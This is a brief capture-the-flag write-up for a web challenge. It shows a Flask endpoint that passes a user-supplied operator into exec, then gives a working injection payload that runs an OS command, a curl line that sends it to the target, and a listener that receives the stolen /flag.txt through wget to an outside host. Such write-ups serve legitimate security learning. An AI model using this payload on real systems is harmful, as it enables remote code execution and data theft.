[Web] Evaluation deck

This challenge is about a web application that presents an API to perform an operation. It takes 2 numbers and 1 operator, and evaluates the corresponding code

@api.route('/get_health', methods=['POST'])
def count():
    if not request.is_json:
        return response('Invalid JSON!'), 400

    data = request.get_json()

    current_health = data.get('current_health')
    attack_power = data.get('attack_power')
    operator = data.get('operator')

    if not current_health or not attack_power or not operator:
        return response('All fields are required!'), 400

    result = {}
    try:
        code = compile(f'result = {int(current_health)} {operator} {int(attack_power)}', '<string>', 'exec')
        exec(code, result)
        return response(result.get('result'))
    except:
        return response('Something Went Wrong!'), 500

We can take the following payload, replacing the operator by a system call

{"current_health":"0", "attack_power":"0", "operator": ";__import__('os').system('wget 1.2.3.4:4444?aaa=`cat /flag.txt`');"}

And use it

curl -d @payload.txt  http://157.245.42.104:32089/api/get_health

Running a python listener, the flag is received

python -m http.server 4444